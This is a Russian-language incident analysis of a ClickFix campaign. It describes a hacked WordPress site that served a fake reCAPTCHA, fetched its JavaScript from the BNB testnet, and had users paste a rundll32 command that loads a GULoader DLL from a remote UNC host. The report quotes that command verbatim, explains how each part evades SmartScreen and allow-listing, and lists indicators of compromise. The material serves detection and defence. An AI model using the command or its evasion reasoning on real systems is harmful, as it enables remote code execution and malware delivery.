ClickFix-атака через WordPress и блокчейн: GULoader остановлен поведенческим детектом

information security

В апреле 2026 года на корпоративной рабочей станции сработало оповещение системы обнаружения на конечных точках. Сигнал был вызван запуском rundll32.exe с аномальными аргументами. Расследование показало, что выполнение команды стало результатом многоступенчатой атаки, объединившей компрометацию легитимного веб-сайта европейского малого бизнеса, технологию EtherHiding, приёмы социальной инженерии ClickFix и доставку загрузчика GULoader по UNC-пути. Инцидент удалось купировать благодаря поведенческому правилу, которое завершило процесс менее чем за 300 миллисекунд.

Описание

Атака началась с того, что пользователь самостоятельно, без фишинговых писем, перешёл на сайт через поиск Google. Сайт работал под управлением WordPress 6.9.4 и содержал плагины электронной коммерции WooCommerce. Злоумышленник внедрил вредоносный JavaScript, не нарушив видимой функциональности - все страницы товаров, формы связи и карты продолжали работать. Механизм внедрения соответствует фреймворку ErrTraffic v3: PHP-бэкдор размещается в каталоге mu-plugins WordPress, который не отображается в стандартном списке плагинов и не может быть отключен через панель администратора. Бэкдор обладает свойством самовосстановления - он создаёт скрытую учётную запись администратора и устанавливает дополнительный плагин, который переустанавливает основной бэкдор при удалении. Сайт оставался полностью работоспособным, а владелец, проверяя его с мобильного телефона, видел чистую страницу.

При загрузке страницы на рабочей станции с Windows JavaScript-инъекция сначала отправляла трекинг-маяк на дешёвые домены верхнего уровня (.sbs, .cyou, .cfd, .icu), собирая метаданные о посетителе: IP-адрес, user-agent, операционную систему, разрешение экрана. Затем система управления трафиком принимала решение: только для настольных браузеров под Windows начинался второй этап - получение полезной нагрузки из блокчейна BNB Smart Chain (BSC) Testnet. Для всех остальных устройств страница оставалась чистой.

Предоставленный анализ сетевого трафика из песочницы и телеметрии конечной точки зафиксировал последовательность запросов к блокчейн-инфраструктуре. Сначала произошёл CORS-запрос к drpc[.]org, затем POST-запрос с вызовом метода eth_call, вернувший 5 килобайт данных. За ним последовал запрос к прямому узлу BSC по порту 8545. Сигнатура системы обнаружения вторжений Suricata в песочнице пометила этот POST-запрос как EtherHiding Exfil M2. Использование блокчейна дало злоумышленникам три ключевых преимущества: данные неизменяемы и не удаляются по жалобам, соединения проходят через легитимные CDN (Cloudflare, Amazon), а сама полезная нагрузка может обновляться без повторного взлома сайта.

Получив JavaScript-код из смарт-контракта, браузер отобразил поверх страницы фальшивый элемент reCAPTCHA. Окно-заставка инструктировало пользователя нажать Win+R, затем Ctrl+V и Enter. К этому моменту в буфер обмена уже был помещён вредоносный команда: rundll32.exe \\autum-path.vo8xalon.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1. После инцидента в ходе опроса пользователь подтвердил, что воспринял инструкции как часть обычной капчи и добровольно выполнил последовательность действий. Таким образом, атака не полагалась на эксплуатацию уязвимостей - она полностью основывалась на самостоятельном действии жертвы.

Каждый элемент команды был выбран для обхода защитных механизмов. rundll32.exe - это подписанный Microsoft системный бинарный файл, который по умолчанию пропускает проверки SmartScreen и политики белых списков приложений. UNC-путь заставляет Windows обращаться к удалённому серверу по протоколу SMB (порт 445) с возможностью понижения до WebDAV через службу WebClient - DLL загружается прямо в память, не записываясь на диск и не получая метку Mark-of-the-Web. Расширение .google не приводит к блокировке, так как ложно выглядит безобидным. Аргумент ,#1 вызывает экспорт функции по порядковому номеру, а не по имени, усложняя статический анализ и обнаружение по логам.

Полный стек вызовов, захваченный EDR-системой (классом решений для обнаружения и реагирования на конечных точках), подтверждает, что цепочка создания процесса прошла через диалог "Выполнить" (Run) в explorer.exe, затем через функции ShellExecuteExW и CreateProcessW. При этом в цепочке присутствует функция CheckSmartScreenWithAltFile - Microsoft Defender SmartScreen оценил запуск и не заблокировал его. Это ожидаемо: rundll32.exe является доверенным компонентом, а UNC-путь не несёт маркера опасности. Процесс был создан в 11:15:37.107, а правило поведенческой защиты "Malicious Behavior Prevention, RunDLL32 with Unusual Arguments" сработало в 11:15:37.393, уничтожив процесс менее чем за 300 миллисекунд.

Домен autum-path.vo8xalon.in.net, который использовался для доставки DLL, приписывается загрузчику GULoader на основе данных Cluster25 на VirusTotal. GULoader представляет собой загрузчик на основе шелл-кода, работающий в памяти и обладающий анти-VM, анти-отладкой и анти-песочницей. Обычно он применяется для последующей загрузки стилеров (Lumma, RedLine, Vidar) и удалённых троянов (Remcos, AgentTesla). Однако в данном случае GULoader не успел инициализироваться: после уничтожения процесса не было запущено ни одного дочернего процесса, не зафиксировано сетевых соединений, признаков кражи учётных данных или латерального перемещения.

Полное сдерживание атаки достигнуто за счёт поведенческого детекта, который анализирует не "кто" выполняет действие, а "что" именно происходит. Все остальные слои защиты - репутация доменов, фильтрация сети, SmartScreen, белые списки приложений и традиционные антивирусы - не имели structural оснований вмешаться. URL и домен были репутационно чистыми, трафик проходил через доверенные CDN, запускаемый файл был подписан Microsoft, а вредоносная DLL не записывалась на диск. Атака ClickFix превращает добровольное действие пользователя в операцию, которая при изолированном рассмотрении выглядит абсолютно легитимной. Единственным эффективным методом защиты в такой схеме остаётся поведенческий анализ, оценивающий именно контекст выполнения, а не формальные признаки легитимности.

Индикаторы компрометации

IPv4

  • 188.114.96.7
  • 188.114.97.7

Domains

  • autum-path.vo8xalon.in.net
  • bsc-testnet.drpc.org
  • data-seed-prebsc-1-s1.bnbchain.org

Malicious LNK

  • \\autum-path.vo8xalon.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google

MD5

  • 236e1bef618edfe7f7c29ee2b4cba620

SHA256

  • 172a25a9ed8b798d8baeec29424b46627b5b39723b37c787f928d3700509001e

Комментарии: 0